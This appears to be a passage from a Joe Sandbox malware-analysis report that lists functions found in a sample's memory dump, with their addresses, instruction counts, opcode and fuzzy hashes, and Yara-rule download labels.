Instruction ID: b6969ebc66c7d3bb614e21034531750e05cb7a3612777405685a2112d0e8a926
Opcode Fuzzy Hash: 02809f48ff5c5e56416546f128f9c71117dc70fe9f854c359580159fe4a2f594
Instruction Fuzzy Hash: 5A419E715583019FD320EF29C845B9BFBE8FF88624F008A2EF998D7251D7709944CB92

Function 016F80A0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa523ebbe99e48b976d23d8807100d0404387bcffcab308cf61392271d3b5daa
Instruction ID: ba8a9c630f9d0d5398ac161bd90bd31845c9b1e40d3aeb858d84804c1b3e792d
Opcode Fuzzy Hash: aa523ebbe99e48b976d23d8807100d0404387bcffcab308cf61392271d3b5daa
Instruction Fuzzy Hash: 8A41D071A05617EFDB01DF18CC806A8F7B9BB44761F2083ADDA15A7380DB34ED428B90

Function 017805A7 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbe91c31ad5c208af229998b7e1838babbac8871100f66966e59a1d49cbbdf10
Instruction ID: cc23b8f9b23250c1ac2af33eafdd69ac7ac337564e82482606a695a387d3ec2f
Opcode Fuzzy Hash: dbe91c31ad5c208af229998b7e1838babbac8871100f66966e59a1d49cbbdf10
Instruction Fuzzy Hash: 1E41D0726446429FD320EF6CC840A7AF7E9FFC8700F140A29F99487680E730E918C7A6

Function 01704859 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ca70540f4704f9b58942d0e5a28a36c2727c5aed78fbce40d0212f9af793f8
Instruction ID: 5624b5253ed06127d328fcd403a53fd289ff00429f95c1a506522ca08880ecd1
Opcode Fuzzy Hash: b2ca70540f4704f9b58942d0e5a28a36c2727c5aed78fbce40d0212f9af793f8
Instruction Fuzzy Hash: C241AE70210302CBD726DF2CD888B2AFBE9AF80364F14487DEA568B2E5DB30D901CB51

Function 016F8B50 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b583d283c2476cb9ea3d2d2ea7a653ff1cc0a3ba9b2f695b003d62484d98fba2
Instruction ID: 5bff359f2b9fe6454adca96e0014ae26b2e6b150ccc4187ebc356bfe48892e94
Opcode Fuzzy Hash: b583d283c2476cb9ea3d2d2ea7a653ff1cc0a3ba9b2f695b003d62484d98fba2
Instruction Fuzzy Hash: AC418271A01609CFCB15CF69CD80A9DF7F6FF98320B1486AED666A7390D734A941CB40

Function 017102E1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction ID: 62aa96b89dbe69484dc105170509e305ee5c9b1ee0bda25a8be0ec7357ff8fd9
Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
Instruction Fuzzy Hash: 03311631A04244AFDB228B6CCC48B9BFFE9AF15350F0445A9F855D739AD7749984CBA0

Function 017AE3DB Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ab429784023f3b9002faacc53ff25f8b9a26f145022ad0ba776648e8a3ea5d7
Instruction ID: 1b2d66c3a37c3ef5be813fb67de47bc2cb1ddd26624899c932f7369cb302dee5
Opcode Fuzzy Hash: 9ab429784023f3b9002faacc53ff25f8b9a26f145022ad0ba776648e8a3ea5d7
Instruction Fuzzy Hash: 9A31C835740716ABD7229F598C44FABBAA8EB99B50F400028F600AB385DAA4DC01D7E0

Function 017B4B4B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53c1f4845100bdfbb39f4625c03daf6740e6fc1608fa1a335f7f8b0ff42a9693
Instruction ID: 15d6fe99b93c27b86b65dda2307fa1a52913bc63cb5a10273295b92c89f82d77
Opcode Fuzzy Hash: 53c1f4845100bdfbb39f4625c03daf6740e6fc1608fa1a335f7f8b0ff42a9693
Instruction Fuzzy Hash: 7E318D326052018FC721DF1DD8C4FA6B7E6FB84760F1A846EE9978B256DB30A840CB91

Function 01704260 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f12f0e313471fe8d7f1b1a8d3f7409f144f3307dc92f55e257957a053436319
Instruction ID: 9c22a12bbaf92b924fc3b15da8292cb5ca799940ef98b45f97dc176ffcc7d8a1
Opcode Fuzzy Hash: 1f12f0e313471fe8d7f1b1a8d3f7409f144f3307dc92f55e257957a053436319
Instruction Fuzzy Hash: BB41AF71204B45DFD722CF68C884B96FBE9AF49714F01886DEA5A8B290C770E804CB50

Function 017B4BB0 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ba3081ea4424729cedfd0cdcf4c4a19c6b02430fea2487f30709ee72efb4d28
Instruction ID: 16a9e617d3da0dec149a98bbd746ad32213e1b20ed6da8b01a9199e04b6826b5
Opcode Fuzzy Hash: 4ba3081ea4424729cedfd0cdcf4c4a19c6b02430fea2487f30709ee72efb4d28
Instruction Fuzzy Hash: D6317C716042019FD720DF2CC8C4BAAB7E5FB84B20F15456DF9969B296E730E904CB91

Function 0177EB1D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769140c02bdce56aba7eb11d6a4bc9426938bda147ff80f490e3a8e9ce48332d
Instruction ID: 4c48e416eb26355c187ec38201a1ffe81feb8e0d4476077e3c8d8704704e76b5
Opcode Fuzzy Hash: 769140c02bdce56aba7eb11d6a4bc9426938bda147ff80f490e3a8e9ce48332d
Instruction Fuzzy Hash: B631A1713416829BFB26576D8948F35FFD9BB41B44F2D00E0AB859B6E2DF28D881C230

Function 017C61C3 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87bb6e637fd346f7b629b39936508c20545e8b274cdd7bc7a44229ad1fbee950
Instruction ID: 44146c718c8deb95db2b3927b0bcf37466b59fa4c0189c077c7216e3cb3f8425
Opcode Fuzzy Hash: 87bb6e637fd346f7b629b39936508c20545e8b274cdd7bc7a44229ad1fbee950
Instruction Fuzzy Hash: E931AF76A0021AABDB15DF98C884BAEF7B6EB48B40F45416DF901EB244D770ED01CBA4

Function 017A483A Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04f51fc0ea8d7d0d1ed649f12980a08ab65a1e5402c96545f53aaae80eb7a1c
Instruction ID: f49395bae8d5676f3fc0b43840aa1bf335ab63708302e7c4df67a25930b247f7
Opcode Fuzzy Hash: e04f51fc0ea8d7d0d1ed649f12980a08ab65a1e5402c96545f53aaae80eb7a1c
Instruction Fuzzy Hash: 3B317236A4012DABCB21DF58DC88BDEBBF9AB98310F1401A5A509A7254CB71DE918F90

Function 0172EB20 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448414b50819365559c43ab3d535fd01d4248f901128de4604af32bac9027b9d
Instruction ID: d4d7ebb1fa2ead38979948be5100655ded86b68d55d3b687f390b2492fbd36e4
Opcode Fuzzy Hash: 448414b50819365559c43ab3d535fd01d4248f901128de4604af32bac9027b9d
Instruction Fuzzy Hash: AC31D332E00225AFDB21DFA9CC80EAEFBF8EF08750F014465E956E7250D7709E418BA0

Function 017C60B8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ffd5bd1df5d2a194e24389769a6c1368bba992c450eba9892feb442e0b458f7
Instruction ID: 1b17df4eff24ed7411cd9c2fdb555f880ed406014193b82af1cd10b5a8cd5550
Opcode Fuzzy Hash: 1ffd5bd1df5d2a194e24389769a6c1368bba992c450eba9892feb442e0b458f7
Instruction Fuzzy Hash: F231B471B40606AFDB129F99C890B7BF7B9AF84B55F11406DF506EB346DA30DD018B90

Function 017007AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b79470889cb7fc16d241777fc6b70a0d85abf700dd5da6c8d3df82ba13393e1
Instruction ID: ca90f5283f783ef3bea8e046d8401ff46fb8fc850f9c4b40bf7b0c6fc9bd2e6d
Opcode Fuzzy Hash: 1b79470889cb7fc16d241777fc6b70a0d85abf700dd5da6c8d3df82ba13393e1
Instruction Fuzzy Hash: 0A31DC32A44712DBC713DE288884A6BFBE6BB942A0F01452DFD59A7290EA30DD1187E1

Function 01708550 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e68c698f4245ea60afedc44f8683a58d06c15d382ce83a14cbdab9dc93a57cb
Instruction ID: 426084456ea8a553bd682defa08a7d780596f5d57d373738ff1e92847f168431
Opcode Fuzzy Hash: 1e68c698f4245ea60afedc44f8683a58d06c15d382ce83a14cbdab9dc93a57cb
Instruction Fuzzy Hash: F4318C71A09302CFE761CF19C840B2AFBE9FB98700F15496EE9849B391D771E844CB92

Function 0173A6C7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction ID: 556a88ca7cea968400253fc7b7cda2a07514b2d17c66015aeceff586a559a145
Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction Fuzzy Hash: 7F3128B2B00B01AFE765CF69DD81B57FBF8AB48A50F04092DA59AC3651E730E9008B60

Function 017AEBD0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6bf765d6ea8ce651062690c9417a745540e21ff73a8df44b7b272e18c7ccda1
Instruction ID: 6dc8f38de8f68e1420e8b40b64e5f2ce8abc7bf179a3317591f9abd0b6cecf56
Opcode Fuzzy Hash: c6bf765d6ea8ce651062690c9417a745540e21ff73a8df44b7b272e18c7ccda1
Instruction Fuzzy Hash: BC317AB16053028FCB11DF19C58495AFBF1FFC9618F444AAEF4889B355E730A984CB92

Function 0172438F Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c16cd26ac97f7f0a7cac69e6ddbba36658de4d86435767baaa7b4b65bed09e0
Instruction ID: 6deaf1b6a09a359d5fad051ffa2882309ae43fac01f54ba07e25ca0b50ed82f7
Opcode Fuzzy Hash: 6c16cd26ac97f7f0a7cac69e6ddbba36658de4d86435767baaa7b4b65bed09e0
Instruction Fuzzy Hash: E931F172B006169FD720EFA8C884A6EFBF9AF94304F008429D506D7258E730ED46CB90

Function 016FCB7E Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction ID: dd871babd243dd7b6ecd99f1e086ff199c29b7e5520d1668fc58186971e64131
Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
Instruction Fuzzy Hash: 2D210436E4025AAADB109BB98811BAFFBB5AF14740F0581799E15E7340E6B0D90187A0

Function 016FC156 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cce7b3cc84c40b1a1e924ed5d185b6650520270a037b2f0ec71fed10ac529ab
Instruction ID: 703da18acaf4b05147602c68c1551375cc4c21de8a525bd8f4fbb04869444165
Opcode Fuzzy Hash: 4cce7b3cc84c40b1a1e924ed5d185b6650520270a037b2f0ec71fed10ac529ab
Instruction Fuzzy Hash: 2E314B715002018BD731AF6CCC44BA9F7B4EF50314F54C5ADED859B38AEAB4D982CBA0

Function 017BC3CD Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction ID: d78ccd86c5261e1914f38b8bcfb951e459c51d5ae2b9680dcad73a80904b8ab2
Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
Instruction Fuzzy Hash: FC212D3A60065677CB16ABD58C44BFAFFB5EF40710F40C41AFA958B591E738DA40C360

Function 016FE420 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5988ef6bebbc2c72ea065a59a24285611388192311357313bc558426525fd15c
Instruction ID: 90df28cedf60917f9a7ae0020c424ca71638b42fbe8c0088c588ebd38f109f47
Opcode Fuzzy Hash: 5988ef6bebbc2c72ea065a59a24285611388192311357313bc558426525fd15c
Instruction Fuzzy Hash: 4931F731A0152C9BDB31DF18CC45FEEBBB9EB15750F0200A9E745A72A0E775AE858F90

Function 01734588 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction ID: eee6649149cd97b3b7baffa0cfb13a63afa8f9ba77a75a8e6b01a331dead9b15
Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction Fuzzy Hash: 70218675A00609EFCB19CF58C984A8EFBB5FF88714F1080A5EE169F246D671DE05DB90

Function 017344B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87473dd4e20a2cc437f601586c663c47e3974136390e09b9b6071ce06d999901
Instruction ID: ab8e650795b6e5cb98f5c5696e0c36bb8557d7112f8f51a291e6ec1e13a28c81
Opcode Fuzzy Hash: 87473dd4e20a2cc437f601586c663c47e3974136390e09b9b6071ce06d999901
Instruction Fuzzy Hash: 7321B472A047459BCB26DF18C440B6BFBE4FB88760F104559F9569B685D730DA01CB91

Function 016FE388 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction ID: 76d8fc936c17569d2d0904bb84dcfd7dfebfd5c24946f30c55acc7cb1c29d869
Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
Instruction Fuzzy Hash: 74317C31600605EFD721CF68C888F6ABBB9FF45354F1145A9EA52CB2A4E770EE42CB50

Function 0177E609 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d52514f881829779e47e91ee2bcd2b110348ddd51dbbec9bd551f780636a1cba
Instruction ID: c688e936e0651254ed1d3b10dc5d6f4b649caeae5cd3f6b214dcaa15b680b3b5
Opcode Fuzzy Hash: d52514f881829779e47e91ee2bcd2b110348ddd51dbbec9bd551f780636a1cba
Instruction Fuzzy Hash: B3314975A002059FCF14DF18C8889AEB7B6FF84714F158499E809DB395EB71AA50CB91

Function 017806F1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab128a2ffa10cb56fbd547d9e59c91df757e50f7b1f00bec916874c085e81c8
Instruction ID: ef25c59849eb914fec9ef44d103c9454c8e370b39175af5e3b10acaba7df8095
Opcode Fuzzy Hash: bab128a2ffa10cb56fbd547d9e59c91df757e50f7b1f00bec916874c085e81c8
Instruction Fuzzy Hash: CE219F76900629ABCF24EF59C881ABEF7F4FF48740B554069F941EB244D738AD42CBA1

Function 0178019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aafd310f22a646455816a606f852b32f12fe3c42d259e1d318741baf7450a25
Instruction ID: 3258189bbd92b7dc82776a4435d601a20560c95c15e8d73e218aa476bd06b9d3
Opcode Fuzzy Hash: 3aafd310f22a646455816a606f852b32f12fe3c42d259e1d318741baf7450a25
Instruction Fuzzy Hash: A4219C71A00645AFD715EBACD844F6AF7A8FF48750F140069F944DB6A0D734ED40CBA4

Function 01780283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fd542f0d2d96799724c2fc26c1398dc268506b911281a529f52568d832a229d
Instruction ID: cdad74c3dc42250308ac33c7a663784bb413b0685bf7c7bab3bd1d75db56f6cb
Opcode Fuzzy Hash: 0fd542f0d2d96799724c2fc26c1398dc268506b911281a529f52568d832a229d
Instruction Fuzzy Hash: 9221D0729443469FD711EF5DC848F5BFBECAFA0250F08045ABD80C7655D730C909C6A2

Function 01722835 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b3d671a19fa884bae749821c0cca46ab69c730c1309cecd9b0b4a4959974a1
Instruction ID: 3678045f7fa54f2ee777412d494385d41980adbb6ae81c50cb8422bb3ac26a63
Opcode Fuzzy Hash: 74b3d671a19fa884bae749821c0cca46ab69c730c1309cecd9b0b4a4959974a1
Instruction Fuzzy Hash: E0210E317456919BE322676C8C08F15FBD5AF41774F2903A4FE60AF6DBD7A8D882C150

Function 0173A30B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d446a268dd6c86c92c03de0c8e5f5358fa5b24007881d501117595709db5961b
Instruction ID: 590c1c1ed8586e374e596136331464c55877c4cee70541a24e5b9809a3d78c99
Opcode Fuzzy Hash: d446a268dd6c86c92c03de0c8e5f5358fa5b24007881d501117595709db5961b
Instruction Fuzzy Hash: AA21A779240B019FCB29DF29CC01B56B7F5BF48B14F2484ACA549CBB66E371E842CB94

Function 017BA49A Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eabe79c714d32698ab53df33f046e9e844b0aff7dbef238cc03ccd7523a79439
Instruction ID: 870a00d97be755f4a691762705a84be19df88901ec91b8df9cf6bc37effad1ec
Opcode Fuzzy Hash: eabe79c714d32698ab53df33f046e9e844b0aff7dbef238cc03ccd7523a79439
Instruction Fuzzy Hash: DB11E772740A11BFD72266599C85FABF6D9DFD4B60F610028B709CB184EB60DD0187A5

Function 01780946 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2adacd0ef51abaa0d645c84f21fe1d661e16813a0242857f5aead4be7c6b3ce7
Instruction ID: b08e5627a1266a024c251a87549a24a3c4fa957fb084e1f6fa4a5d17cdaf851d
Opcode Fuzzy Hash: 2adacd0ef51abaa0d645c84f21fe1d661e16813a0242857f5aead4be7c6b3ce7
Instruction Fuzzy Hash: 4E21E3B1E40209EFCB20DFAAD884AAEFBF8FF98710F10012FE505A7244D6709945CB64

Function 017980A8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction ID: 6cf8c5707ddbca2bcad46de7c5176f7c1b117e5c42f3e1bb5a04c3d837d30632
Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction Fuzzy Hash: 64218EB2A00209EFDF129F98DC44BAEFBB9EF89350F244859F910A7251E734D9509B50

Function 01730124 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

